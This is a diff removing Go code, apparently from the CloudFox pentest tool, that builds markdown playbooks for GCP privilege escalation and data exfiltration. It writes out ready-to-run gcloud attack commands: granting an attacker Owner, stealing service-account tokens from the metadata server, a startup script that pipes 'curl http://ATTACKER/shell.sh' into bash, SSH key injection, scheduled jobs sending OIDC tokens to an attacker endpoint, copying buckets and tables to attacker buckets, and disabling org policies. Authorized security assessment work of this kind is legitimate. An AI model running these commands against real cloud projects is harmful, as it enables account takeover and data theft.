- sections.WriteString("gcloud storage hmac create TARGET_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // IAM Modification - if len(categories["IAM Modification"]) > 0 { - sections.WriteString("## IAM Policy Modification\n\n") - sections.WriteString("Principals with IAM modification capabilities can grant themselves elevated access.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["IAM Modification"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Grant Owner role at project level\n") - sections.WriteString("gcloud projects add-iam-policy-binding PROJECT_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/owner'\n\n") - sections.WriteString("# Grant SA impersonation on a privileged SA\n") - sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") - sections.WriteString(" TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/iam.serviceAccountTokenCreator'\n\n") - sections.WriteString("# Create custom role with escalation permissions\n") - sections.WriteString("gcloud iam roles create privesc --project=PROJECT_ID \\\n") - sections.WriteString(" --permissions='iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create'\n") - sections.WriteString("```\n\n") - } - - // Compute - if len(categories["Compute"]) > 0 { - sections.WriteString("## Compute Instance Exploitation\n\n") - sections.WriteString("Principals with compute permissions can create instances or modify metadata to escalate privileges.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Compute"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create instance with privileged SA (compute.instances.create + iam.serviceAccounts.actAs)\n") - sections.WriteString("gcloud compute instances create pwned \\\n") - sections.WriteString(" --zone=us-central1-a \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --scopes=cloud-platform\n\n") - sections.WriteString("# SSH and steal token\n") - sections.WriteString("gcloud compute ssh pwned --zone=us-central1-a \\\n") - sections.WriteString(" --command='curl -s -H \"Metadata-Flavor: Google\" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") - sections.WriteString("# Inject startup script for reverse shell (compute.instances.setMetadata)\n") - sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") - sections.WriteString(" --metadata=startup-script='#!/bin/bash\n") - sections.WriteString("curl http://ATTACKER/shell.sh | bash'\n\n") - sections.WriteString("# Add SSH key via metadata\n") - sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") - sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n\n") - sections.WriteString("# Project-wide SSH key injection (compute.projects.setCommonInstanceMetadata)\n") - sections.WriteString("gcloud compute project-info add-metadata \\\n") - sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n") - sections.WriteString("```\n\n") - } - - // Serverless - if len(categories["Serverless"]) > 0 { - sections.WriteString("## Serverless Function/Service Exploitation\n\n") - sections.WriteString("Principals with serverless permissions can deploy code that runs as privileged service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Serverless"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Cloud Functions:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create function that steals SA token\n") - sections.WriteString("mkdir /tmp/pwn && cd /tmp/pwn\n") - sections.WriteString("cat > main.py << 'EOF'\n") - sections.WriteString("import functions_framework\n") - sections.WriteString("import requests\n\n") - sections.WriteString("@functions_framework.http\n") - sections.WriteString("def pwn(request):\n") - sections.WriteString(" r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") - sections.WriteString(" headers={'Metadata-Flavor': 'Google'})\n") - sections.WriteString(" return r.json()\n") - sections.WriteString("EOF\n") - sections.WriteString("echo 'functions-framework\\nrequests' > requirements.txt\n\n") - sections.WriteString("# Deploy with target SA\n") - sections.WriteString("gcloud functions deploy token-stealer --gen2 --runtime=python311 \\\n") - sections.WriteString(" --trigger-http --allow-unauthenticated \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Cloud Run:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Deploy Cloud Run service with target SA\n") - sections.WriteString("gcloud run deploy token-stealer --image=gcr.io/PROJECT/stealer \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --allow-unauthenticated\n") - sections.WriteString("```\n\n") - } - - // Data Processing - if len(categories["Data Processing"]) > 0 { - sections.WriteString("## Data Processing Service Exploitation\n\n") - sections.WriteString("Principals with data processing permissions can submit jobs that run as privileged service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Data Processing"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Dataproc:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create Dataproc cluster with privileged SA\n") - sections.WriteString("gcloud dataproc clusters create pwned \\\n") - sections.WriteString(" --region=us-central1 \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Submit job to steal token\n") - sections.WriteString("gcloud dataproc jobs submit pyspark token_stealer.py \\\n") - sections.WriteString(" --cluster=pwned --region=us-central1\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Dataflow:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create Dataflow job with privileged SA\n") - sections.WriteString("gcloud dataflow jobs run pwned \\\n") - sections.WriteString(" --gcs-location=gs://dataflow-templates/latest/Word_Count \\\n") - sections.WriteString(" --service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // AI/ML - if len(categories["AI/ML"]) > 0 { - sections.WriteString("## AI/ML Platform Exploitation\n\n") - sections.WriteString("Principals with AI/ML permissions can create notebooks or training jobs that run as privileged SAs.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["AI/ML"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Vertex AI Workbench:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create notebook instance with privileged SA\n") - sections.WriteString("gcloud notebooks instances create privesc-notebook \\\n") - sections.WriteString(" --location=us-central1-a \\\n") - sections.WriteString(" --machine-type=n1-standard-4 \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Access the notebook via JupyterLab UI or proxy\n") - sections.WriteString("gcloud notebooks instances describe privesc-notebook --location=us-central1-a\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Vertex AI Custom Jobs:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create custom training job with privileged SA\n") - sections.WriteString("gcloud ai custom-jobs create \\\n") - sections.WriteString(" --region=us-central1 \\\n") - sections.WriteString(" --display-name=privesc-job \\\n") - sections.WriteString(" --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=gcr.io/PROJECT/token-stealer \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // Orchestration - if len(categories["Orchestration"]) > 0 { - sections.WriteString("## Orchestration Service Exploitation\n\n") - sections.WriteString("Principals with orchestration permissions can create environments that run as privileged SAs.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Orchestration"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Cloud Composer:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Composer environments run Airflow with a highly privileged SA\n") - sections.WriteString("gcloud composer environments create pwned \\\n") - sections.WriteString(" --location=us-central1 \\\n") - sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Upload malicious DAG to steal credentials\n") - sections.WriteString("gcloud composer environments storage dags import \\\n") - sections.WriteString(" --environment=pwned --location=us-central1 \\\n") - sections.WriteString(" --source=malicious_dag.py\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Cloud Scheduler:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create scheduled job that runs with target SA (OIDC auth)\n") - sections.WriteString("gcloud scheduler jobs create http privesc-job \\\n") - sections.WriteString(" --schedule='* * * * *' \\\n") - sections.WriteString(" --uri='https://ATTACKER_CONTROLLED_ENDPOINT/receive' \\\n") - sections.WriteString(" --oidc-service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --location=us-central1\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Cloud Tasks:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create task queue\n") - sections.WriteString("gcloud tasks queues create privesc-queue --location=us-central1\n\n") - sections.WriteString("# Create HTTP task with OIDC token\n") - sections.WriteString("gcloud tasks create-http-task \\\n") - sections.WriteString(" --queue=privesc-queue \\\n") - sections.WriteString(" --url='https://ATTACKER_CONTROLLED_ENDPOINT/receive' \\\n") - sections.WriteString(" --oidc-service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --location=us-central1\n") - sections.WriteString("```\n\n") - } - - // CI/CD - if len(categories["CI/CD"]) > 0 { - sections.WriteString("## CI/CD Service Exploitation\n\n") - sections.WriteString("Principals with CI/CD permissions can run builds with the Cloud Build service account.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["CI/CD"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create malicious cloudbuild.yaml\n") - sections.WriteString("cat > cloudbuild.yaml << 'EOF'\n") - sections.WriteString("steps:\n") - sections.WriteString("- name: 'gcr.io/cloud-builders/gcloud'\n") - sections.WriteString(" entrypoint: 'bash'\n") - sections.WriteString(" args:\n") - sections.WriteString(" - '-c'\n") - sections.WriteString(" - |\n") - sections.WriteString(" # Cloud Build SA has project Editor by default!\n") - sections.WriteString(" gcloud projects add-iam-policy-binding $PROJECT_ID \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/owner'\n") - sections.WriteString("EOF\n\n") - sections.WriteString("# Submit build\n") - sections.WriteString("gcloud builds submit --config=cloudbuild.yaml .\n") - sections.WriteString("```\n\n") - } - - // IaC (Infrastructure as Code) - if len(categories["IaC"]) > 0 { - sections.WriteString("## Infrastructure as Code Exploitation\n\n") - sections.WriteString("Principals with IaC permissions can deploy infrastructure using the Deployment Manager service account.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["IaC"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - Deployment Manager:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create deployment config that grants attacker Owner role\n") - sections.WriteString("cat > privesc-config.yaml << 'EOF'\n") - sections.WriteString("resources:\n") - sections.WriteString("- name: privesc-binding\n") - sections.WriteString(" type: gcp-types/cloudresourcemanager-v1:virtual.projects.iamMemberBinding\n") - sections.WriteString(" properties:\n") - sections.WriteString(" resource: PROJECT_ID\n") - sections.WriteString(" role: roles/owner\n") - sections.WriteString(" member: user:attacker@example.com\n") - sections.WriteString("EOF\n\n") - sections.WriteString("# Deploy - runs as [PROJECT_NUMBER]@cloudservices.gserviceaccount.com\n") - sections.WriteString("gcloud deployment-manager deployments create privesc-deploy \\\n") - sections.WriteString(" --config=privesc-config.yaml\n") - sections.WriteString("```\n\n") - } - - // GKE - if len(categories["GKE"]) > 0 { - sections.WriteString("## GKE Cluster Exploitation\n\n") - sections.WriteString("Principals with GKE permissions can access clusters, exec into pods, or read secrets.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["GKE"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Get cluster credentials\n") - sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE\n\n") - sections.WriteString("# Exec into a pod\n") - sections.WriteString("kubectl exec -it POD_NAME -- /bin/sh\n\n") - sections.WriteString("# Read secrets\n") - sections.WriteString("kubectl get secrets -A -o yaml\n\n") - sections.WriteString("# Steal node SA token (if Workload Identity not enabled)\n") - sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\n") - sections.WriteString("```\n\n") - } - - // Secrets - if len(categories["Secrets"]) > 0 { - sections.WriteString("## Secret Access\n\n") - sections.WriteString("Principals with secret access can retrieve sensitive credentials.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Secrets"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List all secrets\n") - sections.WriteString("gcloud secrets list --project=PROJECT_ID\n\n") - sections.WriteString("# Access secret value\n") - sections.WriteString("gcloud secrets versions access latest --secret=SECRET_NAME --project=PROJECT_ID\n\n") - sections.WriteString("# Grant yourself secret access if you have setIamPolicy\n") - sections.WriteString("gcloud secrets add-iam-policy-binding SECRET_NAME \\\n") - sections.WriteString(" --member='user:attacker@example.com' \\\n") - sections.WriteString(" --role='roles/secretmanager.secretAccessor'\n") - sections.WriteString("```\n\n") - } - - // Federation (Workload Identity) - if len(categories["Federation"]) > 0 { - sections.WriteString("## Workload Identity Federation Exploitation\n\n") - sections.WriteString("Principals with federation permissions can create identity pools that allow external identities to impersonate GCP service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Federation"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create workload identity pool\n") - sections.WriteString("gcloud iam workload-identity-pools create attacker-pool \\\n") - sections.WriteString(" --location=global \\\n") - sections.WriteString(" --display-name='Attacker Pool'\n\n") - sections.WriteString("# Create OIDC provider pointing to attacker-controlled IdP\n") - sections.WriteString("gcloud iam workload-identity-pools providers create-oidc attacker-provider \\\n") - sections.WriteString(" --location=global \\\n") - sections.WriteString(" --workload-identity-pool=attacker-pool \\\n") - sections.WriteString(" --issuer-uri='https://attacker-idp.example.com' \\\n") - sections.WriteString(" --attribute-mapping='google.subject=assertion.sub'\n\n") - sections.WriteString("# Grant the pool's identities ability to impersonate a SA\n") - sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") - sections.WriteString(" PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --role=roles/iam.workloadIdentityUser \\\n") - sections.WriteString(" --member='principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/attacker-pool/*'\n") - sections.WriteString("```\n\n") - } - - // Org Policy - if len(categories["Org Policy"]) > 0 { - sections.WriteString("## Organization Policy Exploitation\n\n") - sections.WriteString("Principals with org policy permissions can disable security constraints across the organization.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Org Policy"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Disable domain restricted sharing constraint\n") - sections.WriteString("cat > policy.yaml << 'EOF'\n") - sections.WriteString("constraint: constraints/iam.allowedPolicyMemberDomains\n") - sections.WriteString("listPolicy:\n") - sections.WriteString(" allValues: ALLOW\n") - sections.WriteString("EOF\n") - sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n\n") - sections.WriteString("# Disable service account key creation constraint\n") - sections.WriteString("cat > policy.yaml << 'EOF'\n") - sections.WriteString("constraint: constraints/iam.disableServiceAccountKeyCreation\n") - sections.WriteString("booleanPolicy:\n") - sections.WriteString(" enforced: false\n") - sections.WriteString("EOF\n") - sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n") - sections.WriteString("```\n\n") - } - - // Network Access - if len(categories["Network Access"]) > 0 { - sections.WriteString("## Network Access Exploitation\n\n") - sections.WriteString("Principals with network access permissions can create tunnels or modify firewall rules to access internal resources.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Network Access"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - IAP Tunnel:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Start IAP tunnel to SSH port\n") - sections.WriteString("gcloud compute start-iap-tunnel INSTANCE_NAME 22 \\\n") - sections.WriteString(" --local-host-port=localhost:2222 \\\n") - sections.WriteString(" --zone=us-central1-a\n\n") - sections.WriteString("# SSH through the tunnel\n") - sections.WriteString("ssh -p 2222 user@localhost\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Firewall Rules:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create firewall rule allowing attacker IP\n") - sections.WriteString("gcloud compute firewall-rules create allow-attacker \\\n") - sections.WriteString(" --network=default \\\n") - sections.WriteString(" --allow=tcp:22,tcp:3389,tcp:443 \\\n") - sections.WriteString(" --source-ranges=ATTACKER_IP/32\n") - sections.WriteString("```\n\n") - } - - return sections.String() -} - -// GenerateExfilPlaybook generates a comprehensive data exfiltration playbook from attack paths -func GenerateExfilPlaybook(paths []AttackPath, identityHeader string) string { - if len(paths) == 0 { - return "" - } - - var sections strings.Builder - if identityHeader != "" { - sections.WriteString(fmt.Sprintf(`# Data Exfiltration Playbook for %s -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified data exfiltration capabilities. - -`, identityHeader)) - } else { - sections.WriteString(`# GCP Data Exfiltration Playbook -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified data exfiltration capabilities. - -`) - } - - // Group by category - includes both permission-based paths and actual misconfigurations - categories := map[string][]AttackPath{ - // Permission-based categories - "Storage": {}, - "BigQuery": {}, - "Compute Export": {}, - "Database": {}, - "Logging": {}, - "Messaging": {}, - "Secrets": {}, - "Storage Transfer": {}, - "Encryption": {}, - // Actual misconfiguration categories - "Public Snapshot": {}, - "Public Image": {}, - "Public Bucket": {}, - "Logging Sink": {}, - "Pub/Sub Push": {}, - "Pub/Sub BigQuery Export": {}, - "Pub/Sub GCS Export": {}, - "Public BigQuery": {}, - "Cloud SQL Export": {}, - "Storage Transfer Job": {}, - // Potential vector categories - "Potential Vector": {}, - } - - for _, path := range paths { - if _, ok := categories[path.Category]; ok { - categories[path.Category] = append(categories[path.Category], path) - } - } - - // Storage - if len(categories["Storage"]) > 0 { - sections.WriteString("## Cloud Storage Exfiltration\n\n") - sections.WriteString("Principals with storage permissions can read or export data from Cloud Storage buckets.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Storage"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List all buckets\n") - sections.WriteString("gcloud storage buckets list --project=PROJECT_ID\n\n") - sections.WriteString("# List objects in a bucket\n") - sections.WriteString("gcloud storage ls gs://BUCKET_NAME/\n\n") - sections.WriteString("# Download all objects\n") - sections.WriteString("gcloud storage cp -r gs://BUCKET_NAME/ ./exfil/\n\n") - sections.WriteString("# Copy to attacker-controlled bucket\n") - sections.WriteString("gcloud storage cp -r gs://VICTIM_BUCKET/ gs://ATTACKER_BUCKET/\n") - sections.WriteString("```\n\n") - } - - // BigQuery - if len(categories["BigQuery"]) > 0 { - sections.WriteString("## BigQuery Exfiltration\n\n") - sections.WriteString("Principals with BigQuery permissions can query or export data.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["BigQuery"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List datasets\n") - sections.WriteString("bq ls --project_id=PROJECT_ID\n\n") - sections.WriteString("# List tables in dataset\n") - sections.WriteString("bq ls PROJECT_ID:DATASET_NAME\n\n") - sections.WriteString("# Query data\n") - sections.WriteString("bq query --use_legacy_sql=false 'SELECT * FROM `PROJECT.DATASET.TABLE` LIMIT 1000'\n\n") - sections.WriteString("# Export to GCS\n") - sections.WriteString("bq extract PROJECT:DATASET.TABLE gs://ATTACKER_BUCKET/exfil.csv\n") - sections.WriteString("```\n\n") - } - - // Compute Export - if len(categories["Compute Export"]) > 0 { - sections.WriteString("## Compute Exfiltration\n\n") - sections.WriteString("Principals with compute permissions can export snapshots and images.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Compute Export"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create snapshot of disk\n") - sections.WriteString("gcloud compute disks snapshot DISK_NAME --zone=ZONE --snapshot-names=exfil-snap\n\n") - sections.WriteString("# Export snapshot to external project\n") - sections.WriteString("gcloud compute snapshots add-iam-policy-binding exfil-snap \\\n") - sections.WriteString(" --member='user:attacker@external.com' --role='roles/compute.storageAdmin'\n\n") - sections.WriteString("# Create image from disk\n") - sections.WriteString("gcloud compute images create exfil-image --source-disk=DISK --source-disk-zone=ZONE\n") - sections.WriteString("```\n\n") - } - - // Database - if len(categories["Database"]) > 0 { - sections.WriteString("## Database Exfiltration\n\n") - sections.WriteString("Principals with database permissions can export database data.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Database"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List Cloud SQL instances\n") - sections.WriteString("gcloud sql instances list --project=PROJECT_ID\n\n") - sections.WriteString("# Export database to GCS\n") - sections.WriteString("gcloud sql export sql INSTANCE_NAME gs://BUCKET/export.sql --database=DATABASE\n\n") - sections.WriteString("# Connect to instance\n") - sections.WriteString("gcloud sql connect INSTANCE_NAME --user=USER\n") - sections.WriteString("```\n\n") - } - - // Logging - if len(categories["Logging"]) > 0 { - sections.WriteString("## Logging Exfiltration\n\n") - sections.WriteString("Principals with logging permissions can access or export logs.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Logging"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Read logs\n") - sections.WriteString("gcloud logging read 'resource.type=\"gce_instance\"' --project=PROJECT_ID --limit=100\n\n") - sections.WriteString("# Create sink to export logs\n") - sections.WriteString("gcloud logging sinks create exfil-sink \\\n") - sections.WriteString(" storage.googleapis.com/ATTACKER_BUCKET --project=PROJECT_ID\n") - sections.WriteString("```\n\n") - } - - // Secrets - if len(categories["Secrets"]) > 0 { - sections.WriteString("## Secret Exfiltration\n\n") - sections.WriteString("Principals with secret access can retrieve sensitive credentials.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Secrets"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List all secrets\n") - sections.WriteString("gcloud secrets list --project=PROJECT_ID\n\n") - sections.WriteString("# Access secret value\n") - sections.WriteString("gcloud secrets versions access latest --secret=SECRET_NAME --project=PROJECT_ID\n") - sections.WriteString("```\n\n") - } - - // Storage Transfer - if len(categories["Storage Transfer"]) > 0 { - sections.WriteString("## Storage Transfer Exfiltration\n\n") - sections.WriteString("Principals with storage transfer permissions can create jobs to external clouds.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Storage Transfer"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create transfer job to AWS S3\n") - sections.WriteString("gcloud transfer jobs create \\\n") - sections.WriteString(" gs://SOURCE_BUCKET \\\n") - sections.WriteString(" s3://ATTACKER_BUCKET \\\n") - sections.WriteString(" --source-creds-file=gcp-creds.json\n") - sections.WriteString("```\n\n") - } - - // ========================================== - // ACTUAL MISCONFIGURATIONS (not just permissions) - // ========================================== - - // Public Snapshots - if len(categories["Public Snapshot"]) > 0 { - sections.WriteString("## Public Compute Snapshots\n\n") - sections.WriteString("These snapshots are publicly accessible and can be used to create disks in attacker-controlled projects.\n\n") - sections.WriteString("### Vulnerable Snapshots:\n") - for _, path := range categories["Public Snapshot"] { - sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create disk from public snapshot in attacker project\n") - sections.WriteString("gcloud compute disks create exfil-disk \\\n") - sections.WriteString(" --source-snapshot=projects/VICTIM_PROJECT/global/snapshots/SNAPSHOT_NAME \\\n") - sections.WriteString(" --zone=us-central1-a \\\n") - sections.WriteString(" --project=ATTACKER_PROJECT\n\n") - sections.WriteString("# Attach disk to instance\n") - sections.WriteString("gcloud compute instances attach-disk INSTANCE \\\n") - sections.WriteString(" --disk=exfil-disk --zone=us-central1-a\n\n") - sections.WriteString("# Mount and access data\n") - sections.WriteString("sudo mkdir /mnt/exfil && sudo mount /dev/sdb1 /mnt/exfil\n") - sections.WriteString("```\n\n") - } - - // Public Images - if len(categories["Public Image"]) > 0 { - sections.WriteString("## Public Compute Images\n\n") - sections.WriteString("These images are publicly accessible and may contain sensitive data or credentials.\n\n") - sections.WriteString("### Vulnerable Images:\n") - for _, path := range categories["Public Image"] { - sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create instance from public image in attacker project\n") - sections.WriteString("gcloud compute instances create exfil-vm \\\n") - sections.WriteString(" --image=projects/VICTIM_PROJECT/global/images/IMAGE_NAME \\\n") - sections.WriteString(" --zone=us-central1-a \\\n") - sections.WriteString(" --project=ATTACKER_PROJECT\n\n") - sections.WriteString("# Access the instance and search for credentials\n") - sections.WriteString("gcloud compute ssh exfil-vm --zone=us-central1-a\n") - sections.WriteString("find / -name '*.pem' -o -name '*.key' -o -name 'credentials*' 2>/dev/null\n") - sections.WriteString("```\n\n") - } - - // Public Buckets - if len(categories["Public Bucket"]) > 0 { - sections.WriteString("## Public Storage Buckets\n\n") - sections.WriteString("These buckets are publicly accessible.\n\n") - sections.WriteString("### Vulnerable Buckets:\n") - for _, path := range categories["Public Bucket"] { - sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# List bucket contents\n") - sections.WriteString("gsutil ls -r gs://BUCKET_NAME/\n\n") - sections.WriteString("# Download all data\n") - sections.WriteString("gsutil -m cp -r gs://BUCKET_NAME/ ./exfil/\n\n") - sections.WriteString("# Search for sensitive files\n") - sections.WriteString("gsutil ls -r gs://BUCKET_NAME/ | grep -E '\\.(pem|key|json|env|config)$'\n") - sections.WriteString("```\n\n") - } - - // Logging Sinks - if len(categories["Logging Sink"]) > 0 { - sections.WriteString("## Cross-Project Logging Sinks\n\n") - sections.WriteString("These logging sinks export logs to external destinations.\n\n") - sections.WriteString("### Identified Sinks:\n") - for _, path := range categories["Logging Sink"] { - dest := path.Description - if dest == "" { - dest = path.TargetResource - } - sections.WriteString(fmt.Sprintf("- %s -> %s\n", path.TargetResource, dest)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create logging sink to attacker-controlled destination\n") - sections.WriteString("gcloud logging sinks create exfil-sink \\\n") - sections.WriteString(" pubsub.googleapis.com/projects/ATTACKER_PROJECT/topics/exfil-logs \\\n") - sections.WriteString(" --log-filter='resource.type=\"gce_instance\"'\n\n") - sections.WriteString("# Export all audit logs\n") - sections.WriteString("gcloud logging sinks create audit-exfil \\\n") - sections.WriteString(" storage.googleapis.com/ATTACKER_BUCKET \\\n") - sections.WriteString(" 